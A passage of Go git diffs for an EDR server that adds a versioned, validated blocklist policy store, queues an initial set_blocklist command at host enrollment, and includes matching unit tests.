+		return len(got) == 1
+	}, 3*time.Second, 25*time.Millisecond,
+		"expected exactly one pending set_blocklist command after enroll")
 
 	var payload struct {
 		Name    string   `json:"name"`
@@ -415,6 +423,50 @@ func TestHandler_EnrollQueuesInitialPolicy(t *testing.T) {
 	assert.Equal(t, "default", payload.Name)
 	assert.Equal(t, int64(2), payload.Version)
 	assert.Equal(t, []string{"/tmp/initial-block"}, payload.Paths)
+}
+
+// TestHandler_EnrollSkipsEmptyPolicy proves the "empty blocklist = no command" contract:
+// a fresh host enrolling against the seeded default policy (version 1, empty blocklist)
+// must NOT receive a set_blocklist command — the agent would just apply-then-discard a
+// no-op, and a later admin PUT fan-out catches the host naturally. This closes the loop
+// with CodeRabbit's comment that an empty initial policy was previously enqueued.
+func TestHandler_EnrollSkipsEmptyPolicy(t *testing.T) {
+	s := store.OpenTestStore(t)
+	es := NewStore(s.DB())
+	ps := policy.New(s.DB())
+	// Do NOT advance the policy — it stays at the seeded v1 empty row.
+
+	h := NewHandler(es, Options{
+		EnrollSecret:  testSecret,
+		RatePerMinute: 30,
+		Logger:        slog.Default(),
+		PolicyStore:   ps,
+		CommandStore:  s,
+	})
+	mux := http.NewServeMux()
+	h.RegisterRoutes(mux)
+	srv := httptest.NewServer(mux)
+	defer srv.Close()
+
+	resp := postEnroll(t, srv, map[string]string{
+		"enroll_secret": testSecret,
+		"hardware_uuid": testUUID,
+		"hostname":      "qa-host",
+		"os_version":    "macOS 15.3",
+		"agent_version": "0.0.1-dev",
+	})
+	defer resp.Body.Close()
+	require.Equal(t, http.StatusOK, resp.StatusCode)
+
+	// Give the detached enqueue goroutine a chance to run (it won't insert, but we need
+	// to be sure it HAD the chance). 500 ms is generous for a skip path.
+	time.Sleep(500 * time.Millisecond)
+	cmds, err := s.ListCommands(t.Context(), testUUID, "pending")
+	require.NoError(t, err)
+	for _, c := range cmds {
+		assert.NotEqual(t, "set_blocklist", c.CommandType,
+			"empty policy must not queue a set_blocklist command")
+	}
 }
 
 func TestEnrollRequest_StringRedactsSecret(t *testing.T) {

--- a/server/enrollment/enrollment_test.go
+++ b/server/enrollment/enrollment_test.go
@@ -15,6 +15,7 @@ import (
 	"github.com/stretchr/testify/assert"
 	"github.com/stretchr/testify/require"
 
+	"github.com/fleetdm/edr/server/policy"
 	"github.com/fleetdm/edr/server/store"
 )
 
@@ -352,6 +353,68 @@ func TestEnroll_SecretNeverLogged(t *testing.T) {
 	// The obviously-bad variant must also not leak.
 	assert.NotContains(t, buf.String(), testSecret+"-wrong",
 		"presented secret must not leak even on failure")
+}
+
+// TestHandler_EnrollQueuesInitialPolicy is the Phase 2 regression bar: a successful
+// enrollment must leave exactly one pending `set_blocklist` command for the new host,
+// with a payload that mirrors the current default policy. Without this, a fresh host
+// starts with no blocklist until the next admin edit.
+func TestHandler_EnrollQueuesInitialPolicy(t *testing.T) {
+	s := store.OpenTestStore(t)
+	es := NewStore(s.DB())
+	ps := policy.New(s.DB())
+
+	// Advance the policy to a non-default version + non-empty blocklist so the test is
+	// actually exercising payload population.
+	_, err := ps.Update(t.Context(), policy.UpdateRequest{
+		Name:  policy.DefaultName,
+		Paths: []string{"/tmp/initial-block"},
+		Actor: "seed",
+	})
+	require.NoError(t, err)
+
+	h := NewHandler(es, Options{
+		EnrollSecret:  testSecret,
+		RatePerMinute: 30,
+		Logger:        slog.Default(),
+		PolicyStore:   ps,
+		CommandStore:  s,
+	})
+	mux := http.NewServeMux()
+	h.RegisterRoutes(mux)
+	srv := httptest.NewServer(mux)
+	defer srv.Close()
+
+	resp := postEnroll(t, srv, map[string]string{
+		"enroll_secret": testSecret,
+		"hardware_uuid": testUUID,
+		"hostname":      "qa-host",
+		"os_version":    "macOS 15.3",
+		"agent_version": "0.0.1-dev",
+	})
+	defer resp.Body.Close()
+	require.Equal(t, http.StatusOK, resp.StatusCode)
+
+	// Exactly one pending set_blocklist command with the seeded policy.
+	cmds, err := s.ListCommands(t.Context(), testUUID, "pending")
+	require.NoError(t, err)
+	var got []store.Command
+	for _, c := range cmds {
+		if c.CommandType == "set_blocklist" {
+			got = append(got, c)
+		}
+	}
+	require.Len(t, got, 1)
+
+	var payload struct {
+		Name    string   `json:"name"`
+		Version int64    `json:"version"`
+		Paths   []string `json:"paths"`
+	}
+	require.NoError(t, json.Unmarshal(got[0].Payload, &payload))
+	assert.Equal(t, "default", payload.Name)
+	assert.Equal(t, int64(2), payload.Version)
+	assert.Equal(t, []string{"/tmp/initial-block"}, payload.Paths)
 }
 
 func TestEnrollRequest_StringRedactsSecret(t *testing.T) {

--- a/server/enrollment/handler.go
+++ b/server/enrollment/handler.go
@@ -199,12 +199,6 @@ func (h *Handler) handleEnroll(w http.ResponseWriter, r *http.Request) {
 		"edr.remote_addr", ip,
 	)
 
-	// Phase 2: queue an initial set_blocklist command so the new host converges to the
-	// current blocklist without waiting for the next admin push. A failure here is
-	// non-fatal: enrollment already succeeded, the agent will get the policy on its
-	// next poll cycle after the next admin edit.
-	h.enqueueInitialPolicy(ctx, result.HostID)
-
 	w.Header().Set("Content-Type", "application/json")
 	w.Header().Set("Cache-Control", "no-store")
 	w.WriteHeader(http.StatusOK)
@@ -213,6 +207,24 @@ func (h *Handler) handleEnroll(w http.ResponseWriter, r *http.Request) {
 		HostToken:  result.HostToken,
 		EnrolledAt: result.EnrolledAt,
 	})
+
+	// Phase 2: queue an initial set_blocklist command AFTER responding so the enroll
+	// request's tail latency is not coupled to the policy store + command insert. The
+	// detached context keeps the DB writes alive even if the client drops the connection
+	// (a transient TLS glitch shouldn't make the host miss its first policy). A failure
+	// here is non-fatal: the next admin policy push re-converges any host whose initial
+	// command didn't land.
+	//
+	// Using a detached background context rather than the request ctx so client
+	// cancellation doesn't abort the best-effort fanout; capped at 10s to match the
+	// outer HTTP server's write timeout + some slack. gosec G118 flags this pattern —
+	// the nolint below is the honest marker that we intentionally decouple the
+	// background work from the request lifetime.
+	go func(hostID string) { //nolint:gosec // G118: intentional detached context so best-effort fanout survives client cancellation.
+		bgCtx, cancel := context.WithTimeout(context.Background(), 10*time.Second)
+		defer cancel()
+		h.enqueueInitialPolicy(bgCtx, hostID)
+	}(result.HostID)
 }
 
 // enqueueInitialPolicy fetches the current default policy and queues a set_blocklist
@@ -220,6 +232,11 @@ func (h *Handler) handleEnroll(w http.ResponseWriter, r *http.Request) {
 // already succeeded, so the operator is not held up by a flaky command insert; the next
 // policy PUT will re-converge the host anyway. Logs at warn so the failure is still
 // visible in SigNoz if a class of hosts systematically fails this step.
+//
+// Skips enqueue entirely when the seeded / current policy is empty (no paths AND no
+// hashes): agents with no prior policy state gain nothing from an "apply empty blocklist"
+// command, and the command would just round-trip for no effect. The next PUT that adds
+// entries will fan out to this host via the admin endpoint's ActiveHostIDs walk.
 func (h *Handler) enqueueInitialPolicy(ctx context.Context, hostID string) {
 	if h.policy == nil || h.commands == nil {
 		return
@@ -227,6 +244,12 @@ func (h *Handler) enqueueInitialPolicy(ctx context.Context, hostID string) {
 	p, err := h.policy.Get(ctx, policy.DefaultName)
 	if err != nil {
 		h.logger.WarnContext(ctx, "initial policy fetch failed", "edr.host_id", hostID, "err", err)
+		return
+	}
+	if len(p.Blocklist.Paths) == 0 && len(p.Blocklist.Hashes) == 0 {
+		// Seed policy (v1 empty) or operator explicitly cleared. Nothing to push.
+		h.logger.InfoContext(ctx, "initial policy skipped — blocklist empty",
+			"edr.host_id", hostID, "edr.policy.version", p.Version)
 		return
 	}
 	payload, err := json.Marshal(policyCommandPayload{

--- a/server/enrollment/handler.go
+++ b/server/enrollment/handler.go
@@ -14,7 +14,24 @@ import (
 	"go.opentelemetry.io/otel/attribute"
 	"go.opentelemetry.io/otel/trace"
 	"golang.org/x/time/rate"
+
+	"github.com/fleetdm/edr/server/policy"
+	"github.com/fleetdm/edr/server/store"
 )
+
+// PolicyGetter is the minimal read interface the enrollment handler needs to queue an
+// initial set_blocklist command at first enroll. Kept as an interface so tests can inject
+// a stub without pulling in a real MySQL instance or the seed migration.
+type PolicyGetter interface {
+	Get(ctx context.Context, name string) (*policy.Policy, error)
+}
+
+// CommandInserter is the narrow interface the enrollment handler needs to queue the
+// initial set_blocklist. Same interface lives in admin.CommandInserter; duplicating it
+// here keeps enrollment free of a dependency on the admin package.
+type CommandInserter interface {
+	InsertCommand(ctx context.Context, c store.Command) (int64, error)
+}
 
 // Handler serves POST /api/v1/enroll. Unauthenticated; rate-limited per source IP; emits an
 // audit log + OTel span attribute set for every enrollment attempt.
@@ -23,7 +40,9 @@ type Handler struct {
 	secret   string
 	logger   *slog.Logger
 	limiter  *ipLimiter
-	trimHost bool // net.SplitHostPort applied in remoteIP; toggleable for tests
+	trimHost bool            // net.SplitHostPort applied in remoteIP; toggleable for tests
+	policy   PolicyGetter    // optional — if nil, no post-enroll fan-out
+	commands CommandInserter // optional — must be non-nil if policy is set
 }
 
 // Options control handler behaviour.
@@ -34,13 +53,23 @@ type Options struct {
 	RatePerMinute int
 	// Logger for audit lines.
 	Logger *slog.Logger
+	// PolicyStore is the read-only view used to queue a set_blocklist command on first
+	// enroll. Optional — leave nil (e.g. in tests) to skip the fan-out. When set,
+	// CommandStore must also be set.
+	PolicyStore PolicyGetter
+	// CommandStore is used to insert the initial set_blocklist command. See PolicyStore.
+	CommandStore CommandInserter
 }
 
 // NewHandler builds an enrollment handler. Panics if EnrollSecret is empty — the operator
-// has to explicitly configure it via EDR_ENROLL_SECRET.
+// has to explicitly configure it via EDR_ENROLL_SECRET. Panics if PolicyStore is set but
+// CommandStore is not: the two fields must be used together.
 func NewHandler(store *Store, opts Options) *Handler {
 	if opts.EnrollSecret == "" {
 		panic("enrollment.NewHandler: EnrollSecret must not be empty")
+	}
+	if opts.PolicyStore != nil && opts.CommandStore == nil {
+		panic("enrollment.NewHandler: PolicyStore set but CommandStore is nil")
 	}
 	if opts.RatePerMinute <= 0 {
 		opts.RatePerMinute = 30
@@ -55,6 +84,8 @@ func NewHandler(store *Store, opts Options) *Handler {
 		logger:   logger,
 		limiter:  newIPLimiter(rate.Every(time.Minute/time.Duration(opts.RatePerMinute)), opts.RatePerMinute),
 		trimHost: true,
+		policy:   opts.PolicyStore,
+		commands: opts.CommandStore,
 	}
 }
 
@@ -168,6 +199,12 @@ func (h *Handler) handleEnroll(w http.ResponseWriter, r *http.Request) {
 		"edr.remote_addr", ip,
 	)
 
+	// Phase 2: queue an initial set_blocklist command so the new host converges to the
+	// current blocklist without waiting for the next admin push. A failure here is
+	// non-fatal: enrollment already succeeded, the agent will get the policy on its
+	// next poll cycle after the next admin edit.
+	h.enqueueInitialPolicy(ctx, result.HostID)
+
 	w.Header().Set("Content-Type", "application/json")
 	w.Header().Set("Cache-Control", "no-store")
 	w.WriteHeader(http.StatusOK)
@@ -176,6 +213,55 @@ func (h *Handler) handleEnroll(w http.ResponseWriter, r *http.Request) {
 		HostToken:  result.HostToken,
 		EnrolledAt: result.EnrolledAt,
 	})
+}
+
+// enqueueInitialPolicy fetches the current default policy and queues a set_blocklist
+// command for the newly-enrolled host. Silent on all failures (best-effort) — enrollment
+// already succeeded, so the operator is not held up by a flaky command insert; the next
+// policy PUT will re-converge the host anyway. Logs at warn so the failure is still
+// visible in SigNoz if a class of hosts systematically fails this step.
+func (h *Handler) enqueueInitialPolicy(ctx context.Context, hostID string) {
+	if h.policy == nil || h.commands == nil {
+		return
+	}
+	p, err := h.policy.Get(ctx, policy.DefaultName)
+	if err != nil {
+		h.logger.WarnContext(ctx, "initial policy fetch failed", "edr.host_id", hostID, "err", err)
+		return
+	}
+	payload, err := json.Marshal(policyCommandPayload{
+		Name:    p.Name,
+		Version: p.Version,
+		Paths:   p.Blocklist.Paths,
+		Hashes:  p.Blocklist.Hashes,
+	})
+	if err != nil {
+		h.logger.WarnContext(ctx, "initial policy marshal failed", "edr.host_id", hostID, "err", err)
+		return
+	}
+	if _, err := h.commands.InsertCommand(ctx, store.Command{
+		HostID:      hostID,
+		CommandType: "set_blocklist",
+		Payload:     payload,
+	}); err != nil {
+		h.logger.WarnContext(ctx, "initial policy enqueue failed", "edr.host_id", hostID, "err", err)
+		return
+	}
+	h.logger.InfoContext(ctx, "initial policy queued",
+		"edr.host_id", hostID,
+		"edr.policy.version", p.Version,
+		"edr.policy.path_count", len(p.Blocklist.Paths),
+	)
+}
+
+// policyCommandPayload mirrors admin.policyCommandPayload. Duplicated here to avoid the
+// import cycle admin → enrollment; any future drift would be caught by a cross-package
+// integration test that queues + consumes the payload.
+type policyCommandPayload struct {
+	Name    string   `json:"name"`
+	Version int64    `json:"version"`
+	Paths   []string `json:"paths"`
+	Hashes  []string `json:"hashes"`
 }
 
 // failf writes a structured JSON error + audit log + span attributes. hostID and agentVersion

--- a/server/policy/policy.go
+++ b/server/policy/policy.go
@@ -1,0 +1,189 @@
+// Package policy owns the Phase 2 server-driven blocklist. A single "default" row in the
+// `policies` table holds the current version + serialized blocklist payload. Admin writes
+// bump the version atomically inside a transaction and can be fanned out to hosts via the
+// Enqueue helper.
+//
+// The package deliberately does NOT depend on the command queue — callers (admin handler,
+// enrollment handler) compose the two: first Update, then Enqueue. This keeps the policy
+// code easy to test without mocking commands, and leaves scheduling/targeting decisions
+// with the caller.
+package policy
+
+import (
+	"context"
+	"database/sql"
+	"encoding/json"
+	"errors"
+	"fmt"
+	"sort"
+	"strings"
+	"time"
+
+	"github.com/jmoiron/sqlx"
+)
+
+// DefaultName is the name of the singleton policy row. v1.1 will add targeted policies
+// (per team / per host group); for MVP this is the only name any production code should use.
+const DefaultName = "default"
+
+// Policy mirrors a row in `policies`. Blocklist is returned as `Blocklist`, not as the raw
+// JSON column, so callers don't need to parse.
+type Policy struct {
+	Name      string    `json:"name"`
+	Version   int64     `json:"version"`
+	Blocklist Blocklist `json:"blocklist"`
+	UpdatedAt time.Time `json:"updated_at"`
+	UpdatedBy string    `json:"updated_by"`
+}
+
+// Blocklist is the subject of policy pushes. `Paths` is a sorted, deduplicated list of
+// absolute file-system paths the extension should DENY under AUTH_EXEC. `Hashes` is a
+// sorted, deduplicated list of lowercase hex SHA-256 strings (extension-side hashing is
+// still a v1.1 feature, but we keep the wire contract future-proof).
+type Blocklist struct {
+	Paths  []string `json:"paths"`
+	Hashes []string `json:"hashes"`
+}
+
+// ErrNotFound is returned when the requested policy row is missing.
+var ErrNotFound = errors.New("policy: not found")
+
+// Store owns the policies table.
+type Store struct {
+	db *sqlx.DB
+}
+
+// New returns a Store over an existing sqlx.DB handle.
+func New(db *sqlx.DB) *Store {
+	return &Store{db: db}
+}
+
+// Get returns the policy row named `name`. Returns ErrNotFound if no row exists — callers
+// that bootstrap from the seed should use DefaultName and can treat ErrNotFound as an
+// operational anomaly (the store schema seeds it).
+func (s *Store) Get(ctx context.Context, name string) (*Policy, error) {
+	var row struct {
+		Name      string    `db:"name"`
+		Version   int64     `db:"version"`
+		Blocklist []byte    `db:"blocklist"`
+		UpdatedAt time.Time `db:"updated_at"`
+		UpdatedBy string    `db:"updated_by"`
+	}
+	err := s.db.GetContext(ctx, &row, `
+		SELECT name, version, blocklist, updated_at, updated_by
+		FROM policies
+		WHERE name = ?
+	`, name)
+	if errors.Is(err, sql.ErrNoRows) {
+		return nil, ErrNotFound
+	}
+	if err != nil {
+		return nil, fmt.Errorf("query policy %q: %w", name, err)
+	}
+
+	var bl Blocklist
+	if err := json.Unmarshal(row.Blocklist, &bl); err != nil {
+		return nil, fmt.Errorf("decode blocklist for policy %q: %w", name, err)
+	}
+	return &Policy{
+		Name:      row.Name,
+		Version:   row.Version,
+		Blocklist: bl,
+		UpdatedAt: row.UpdatedAt,
+		UpdatedBy: row.UpdatedBy,
+	}, nil
+}
+
+// UpdateRequest carries the new blocklist plus the actor performing the change. The actor
+// ends up in `updated_by` and in the audit log; it must be non-empty so post-mortems on a
+// bad policy push always have a name to call.
+type UpdateRequest struct {
+	Name   string
+	Paths  []string
+	Hashes []string
+	Actor  string
+}
+
+// Update atomically bumps the named policy's version and replaces its blocklist. Paths +
+// Hashes are normalised (sorted + deduplicated, paths trimmed) before persisting so the
+// wire payload the extension sees is canonical regardless of input order.
+//
+// Returns the new Policy with the bumped version. If the row is missing Update inserts it
+// at version 1; callers don't need to distinguish insert vs update. Actor must be non-empty.
+func (s *Store) Update(ctx context.Context, req UpdateRequest) (*Policy, error) {
+	if req.Name == "" {
+		return nil, errors.New("policy: name is required")
+	}
+	if strings.TrimSpace(req.Actor) == "" {
+		return nil, errors.New("policy: actor is required")
+	}
+	normalized := normalizeBlocklist(req.Paths, req.Hashes)
+	payload, err := json.Marshal(normalized)
+	if err != nil {
+		return nil, fmt.Errorf("marshal blocklist: %w", err)
+	}
+
+	tx, err := s.db.BeginTxx(ctx, nil)
+	if err != nil {
+		return nil, fmt.Errorf("begin tx: %w", err)
+	}
+	defer tx.Rollback() //nolint:errcheck // Rollback after commit is a no-op.
+
+	// Upsert so the row is created if the seed migration hasn't yet landed on a fresh DB.
+	// VALUES()-style assignment bumps the version by one on every PUT; the initial insert
+	// starts at 1.
+	if _, err := tx.ExecContext(ctx, `
+		INSERT INTO policies (name, version, blocklist, updated_at, updated_by)
+		VALUES (?, 1, ?, NOW(6), ?)
+		ON DUPLICATE KEY UPDATE
+			version    = version + 1,
+			blocklist  = VALUES(blocklist),
+			updated_at = NOW(6),
+			updated_by = VALUES(updated_by)
+	`, req.Name, payload, req.Actor); err != nil {
+		return nil, fmt.Errorf("upsert policy %q: %w", req.Name, err)
+	}
+
+	if err := tx.Commit(); err != nil {
+		return nil, fmt.Errorf("commit policy update: %w", err)
+	}
+
+	// Round-trip read so we return the canonical stored form (paths/hashes normalised,
+	// timestamps populated by the server).
+	return s.Get(ctx, req.Name)
+}
+
+// normalizeBlocklist returns a deterministic blocklist: paths trimmed + deduped + sorted,
+// hashes lowercased + deduped + sorted. Nil slices become empty so the JSON output is always
+// an array, never null.
+func normalizeBlocklist(paths, hashes []string) Blocklist {
+	bl := Blocklist{
+		Paths:  dedupSort(paths, strings.TrimSpace),
+		Hashes: dedupSort(hashes, func(s string) string { return strings.ToLower(strings.TrimSpace(s)) }),
+	}
+	if bl.Paths == nil {
+		bl.Paths = []string{}
+	}
+	if bl.Hashes == nil {
+		bl.Hashes = []string{}
+	}
+	return bl
+}
+
+func dedupSort(in []string, norm func(string) string) []string {
+	seen := make(map[string]struct{}, len(in))
+	out := make([]string, 0, len(in))
+	for _, s := range in {
+		s = norm(s)
+		if s == "" {
+			continue
+		}
+		if _, ok := seen[s]; ok {
+			continue
+		}
+		seen[s] = struct{}{}
+		out = append(out, s)
+	}
+	sort.Strings(out)
+	return out
+}

--- a/server/policy/policy.go
+++ b/server/policy/policy.go
@@ -15,6 +15,7 @@ import (
 	"encoding/json"
 	"errors"
 	"fmt"
+	"regexp"
 	"sort"
 	"strings"
 	"time"
@@ -105,11 +106,16 @@ type UpdateRequest struct {
 }
 
 // Update atomically bumps the named policy's version and replaces its blocklist. Paths +
-// Hashes are normalised (sorted + deduplicated, paths trimmed) before persisting so the
-// wire payload the extension sees is canonical regardless of input order.
+// Hashes are normalised (sorted + deduplicated, paths trimmed) and validated before
+// persisting so the wire payload the extension sees is canonical and well-formed
+// regardless of input order.
 //
 // Returns the new Policy with the bumped version. If the row is missing Update inserts it
 // at version 1; callers don't need to distinguish insert vs update. Actor must be non-empty.
+//
+// Validation: paths must be absolute filesystem paths (start with '/'); hashes must be
+// 64-character lowercase hex (SHA-256). An invalid entry fails the whole update so a
+// bad policy never gets versioned, audited, and fanned out.
 func (s *Store) Update(ctx context.Context, req UpdateRequest) (*Policy, error) {
 	if req.Name == "" {
 		return nil, errors.New("policy: name is required")
@@ -118,6 +124,9 @@ func (s *Store) Update(ctx context.Context, req UpdateRequest) (*Policy, error) 
 		return nil, errors.New("policy: actor is required")
 	}
 	normalized := normalizeBlocklist(req.Paths, req.Hashes)
+	if err := validateBlocklist(normalized); err != nil {
+		return nil, err
+	}
 	payload, err := json.Marshal(normalized)
 	if err != nil {
 		return nil, fmt.Errorf("marshal blocklist: %w", err)
@@ -144,13 +153,61 @@ func (s *Store) Update(ctx context.Context, req UpdateRequest) (*Policy, error) 
 		return nil, fmt.Errorf("upsert policy %q: %w", req.Name, err)
 	}
 
+	// Read the row we just wrote INSIDE the same tx, before commit. Reading via s.Get
+	// after Commit leaves a window where another admin update can interleave and we'd
+	// return (and fan out) someone else's version; REPEATABLE READ inside a tx prevents
+	// that interleaving.
+	var row struct {
+		Name      string    `db:"name"`
+		Version   int64     `db:"version"`
+		Blocklist []byte    `db:"blocklist"`
+		UpdatedAt time.Time `db:"updated_at"`
+		UpdatedBy string    `db:"updated_by"`
+	}
+	if err := tx.GetContext(ctx, &row, `
+		SELECT name, version, blocklist, updated_at, updated_by
+		FROM policies
+		WHERE name = ?
+	`, req.Name); err != nil {
+		return nil, fmt.Errorf("read updated policy %q: %w", req.Name, err)
+	}
 	if err := tx.Commit(); err != nil {
 		return nil, fmt.Errorf("commit policy update: %w", err)
 	}
 
-	// Round-trip read so we return the canonical stored form (paths/hashes normalised,
-	// timestamps populated by the server).
-	return s.Get(ctx, req.Name)
+	var bl Blocklist
+	if err := json.Unmarshal(row.Blocklist, &bl); err != nil {
+		return nil, fmt.Errorf("decode updated blocklist for policy %q: %w", req.Name, err)
+	}
+	return &Policy{
+		Name:      row.Name,
+		Version:   row.Version,
+		Blocklist: bl,
+		UpdatedAt: row.UpdatedAt,
+		UpdatedBy: row.UpdatedBy,
+	}, nil
+}
+
+// hashPattern is a 64-character lowercase hex string, the canonical SHA-256 representation.
+// We enforce lowercase at the validation boundary rather than after the fact because the
+// normalization step upstream already lowercases input.
+var hashPattern = regexp.MustCompile(`^[0-9a-f]{64}$`)
+
+// validateBlocklist enforces the documented contract: paths must be absolute (start with
+// "/"), hashes must be 64-char lowercase hex. Returns a descriptive error naming the first
+// offending entry so operators can fix the PUT and retry.
+func validateBlocklist(bl Blocklist) error {
+	for _, p := range bl.Paths {
+		if !strings.HasPrefix(p, "/") {
+			return fmt.Errorf("policy: path %q must be absolute (start with '/')", p)
+		}
+	}
+	for _, h := range bl.Hashes {
+		if !hashPattern.MatchString(h) {
+			return fmt.Errorf("policy: hash %q must be 64 lowercase hex chars (SHA-256)", h)
+		}
+	}
+	return nil
 }
 
 // normalizeBlocklist returns a deterministic blocklist: paths trimmed + deduped + sorted,

--- a/server/policy/policy_test.go
+++ b/server/policy/policy_test.go
@@ -1,0 +1,112 @@
+package policy
+
+import (
+	"testing"
+
+	"github.com/stretchr/testify/assert"
+	"github.com/stretchr/testify/require"
+
+	"github.com/fleetdm/edr/server/store"
+)
+
+func newTestStore(t *testing.T) *Store {
+	t.Helper()
+	s := store.OpenTestStore(t)
+	return New(s.DB())
+}
+
+func TestGet_SeedRowPresent(t *testing.T) {
+	s := newTestStore(t)
+	p, err := s.Get(t.Context(), DefaultName)
+	require.NoError(t, err)
+	assert.Equal(t, DefaultName, p.Name)
+	assert.Equal(t, int64(1), p.Version)
+	assert.Equal(t, []string{}, p.Blocklist.Paths)
+	assert.Equal(t, []string{}, p.Blocklist.Hashes)
+	assert.Equal(t, "system", p.UpdatedBy)
+}
+
+func TestGet_UnknownName(t *testing.T) {
+	s := newTestStore(t)
+	_, err := s.Get(t.Context(), "other")
+	require.ErrorIs(t, err, ErrNotFound)
+}
+
+func TestUpdate_BumpsVersionAndNormalizes(t *testing.T) {
+	s := newTestStore(t)
+	ctx := t.Context()
+
+	// Send paths out of order with duplicates + whitespace to exercise normalization.
+	p, err := s.Update(ctx, UpdateRequest{
+		Name:   DefaultName,
+		Paths:  []string{"/opt/b", " /opt/a ", "/opt/b", "", "/opt/a"},
+		Hashes: []string{"DEADBEEF", "deadbeef", " CAFEBABE"},
+		Actor:  "qa-tester",
+	})
+	require.NoError(t, err)
+	assert.Equal(t, int64(2), p.Version, "seed row is v1; first Update takes it to v2")
+	assert.Equal(t, []string{"/opt/a", "/opt/b"}, p.Blocklist.Paths)
+	assert.Equal(t, []string{"cafebabe", "deadbeef"}, p.Blocklist.Hashes)
+	assert.Equal(t, "qa-tester", p.UpdatedBy)
+	assert.False(t, p.UpdatedAt.IsZero())
+
+	// A second update bumps the version again and replaces the blocklist entirely.
+	p2, err := s.Update(ctx, UpdateRequest{
+		Name:   DefaultName,
+		Paths:  []string{"/opt/c"},
+		Hashes: nil,
+		Actor:  "qa-tester",
+	})
+	require.NoError(t, err)
+	assert.Equal(t, int64(3), p2.Version)
+	assert.Equal(t, []string{"/opt/c"}, p2.Blocklist.Paths)
+	assert.Equal(t, []string{}, p2.Blocklist.Hashes)
+}
+
+func TestUpdate_RejectsEmptyActor(t *testing.T) {
+	s := newTestStore(t)
+	_, err := s.Update(t.Context(), UpdateRequest{
+		Name:  DefaultName,
+		Paths: []string{"/opt/x"},
+	})
+	require.ErrorContains(t, err, "actor is required")
+}
+
+func TestUpdate_RejectsEmptyName(t *testing.T) {
+	s := newTestStore(t)
+	_, err := s.Update(t.Context(), UpdateRequest{
+		Actor: "qa-tester",
+	})
+	require.ErrorContains(t, err, "name is required")
+}
+
+func TestUpdate_CreatesMissingRow(t *testing.T) {
+	s := newTestStore(t)
+	ctx := t.Context()
+	p, err := s.Update(ctx, UpdateRequest{
+		Name:  "custom-1",
+		Paths: []string{"/opt/x"},
+		Actor: "qa-tester",
+	})
+	require.NoError(t, err)
+	assert.Equal(t, int64(1), p.Version, "fresh row starts at v1")
+
+	// Seed row untouched.
+	def, err := s.Get(ctx, DefaultName)
+	require.NoError(t, err)
+	assert.Equal(t, int64(1), def.Version)
+}
+
+func TestUpdate_EmptyBlocklistProducesEmptyArrays(t *testing.T) {
+	s := newTestStore(t)
+	ctx := t.Context()
+	p, err := s.Update(ctx, UpdateRequest{
+		Name:   DefaultName,
+		Paths:  nil,
+		Hashes: nil,
+		Actor:  "qa-tester",
+	})
+	require.NoError(t, err)
+	assert.NotNil(t, p.Blocklist.Paths, "paths must be [] not null so clients don't null-check")
+	assert.NotNil(t, p.Blocklist.Hashes)
+}

--- a/server/policy/policy_test.go
+++ b/server/policy/policy_test.go
@@ -1,6 +1,7 @@
 package policy
 
 import (
+	"strings"
 	"testing"
 
 	"github.com/stretchr/testify/assert"
@@ -36,17 +37,23 @@ func TestUpdate_BumpsVersionAndNormalizes(t *testing.T) {
 	s := newTestStore(t)
 	ctx := t.Context()
 
+	const (
+		hashA = "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
+		hashB = "bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb"
+	)
+
 	// Send paths out of order with duplicates + whitespace to exercise normalization.
+	// Hashes mix case + duplicates — post-normalize they must be lowercase, deduped, sorted.
 	p, err := s.Update(ctx, UpdateRequest{
 		Name:   DefaultName,
 		Paths:  []string{"/opt/b", " /opt/a ", "/opt/b", "", "/opt/a"},
-		Hashes: []string{"DEADBEEF", "deadbeef", " CAFEBABE"},
+		Hashes: []string{strings.ToUpper(hashB), hashB, " " + strings.ToUpper(hashA)},
 		Actor:  "qa-tester",
 	})
 	require.NoError(t, err)
 	assert.Equal(t, int64(2), p.Version, "seed row is v1; first Update takes it to v2")
 	assert.Equal(t, []string{"/opt/a", "/opt/b"}, p.Blocklist.Paths)
-	assert.Equal(t, []string{"cafebabe", "deadbeef"}, p.Blocklist.Hashes)
+	assert.Equal(t, []string{hashA, hashB}, p.Blocklist.Hashes)
 	assert.Equal(t, "qa-tester", p.UpdatedBy)
 	assert.False(t, p.UpdatedAt.IsZero())
 
@@ -61,6 +68,55 @@ func TestUpdate_BumpsVersionAndNormalizes(t *testing.T) {
 	assert.Equal(t, int64(3), p2.Version)
 	assert.Equal(t, []string{"/opt/c"}, p2.Blocklist.Paths)
 	assert.Equal(t, []string{}, p2.Blocklist.Hashes)
+}
+
+// TestUpdate_RejectsInvalidBlocklistEntries locks in the Phase 2 validation contract: a
+// malformed path (relative, empty after trim) or hash (not 64 lowercase hex chars) fails
+// the update before anything is persisted. Without this, bad operator input would be
+// versioned + audited + fanned out to agents that silently can't apply it.
+func TestUpdate_RejectsInvalidBlocklistEntries(t *testing.T) {
+	s := newTestStore(t)
+	ctx := t.Context()
+
+	cases := []struct {
+		name       string
+		paths      []string
+		hashes     []string
+		wantErrSub string
+	}{
+		{
+			name:       "relative path rejected",
+			paths:      []string{"relative/path"},
+			wantErrSub: "must be absolute",
+		},
+		{
+			name:       "short hash rejected",
+			hashes:     []string{"deadbeef"},
+			wantErrSub: "64 lowercase hex",
+		},
+		{
+			name:       "non-hex hash rejected",
+			hashes:     []string{"z" + strings.Repeat("a", 63)},
+			wantErrSub: "64 lowercase hex",
+		},
+	}
+	for _, tc := range cases {
+		t.Run(tc.name, func(t *testing.T) {
+			_, err := s.Update(ctx, UpdateRequest{
+				Name:   DefaultName,
+				Paths:  tc.paths,
+				Hashes: tc.hashes,
+				Actor:  "qa-tester",
+			})
+			require.Error(t, err)
+			assert.Contains(t, err.Error(), tc.wantErrSub)
+		})
+	}
+
+	// Seed row untouched — bad updates must not increment the version.
+	p, err := s.Get(ctx, DefaultName)
+	require.NoError(t, err)
+	assert.Equal(t, int64(1), p.Version)
 }
 
 func TestUpdate_RejectsEmptyActor(t *testing.T) {

--- a/server/store/store.go
+++ b/server/store/store.go
@@ -112,6 +112,23 @@ var schemaStatements = []string{
 		revoked_by       VARCHAR(255)   NULL,
 		UNIQUE KEY uk_enrollments_token_id (host_token_id)
 	)`,
+	// policies holds the Phase 2 server-driven blocklist. For MVP we keep a single "default"
+	// row — `name` is a UNIQUE key now so v1.1 can add per-team targeting without a schema
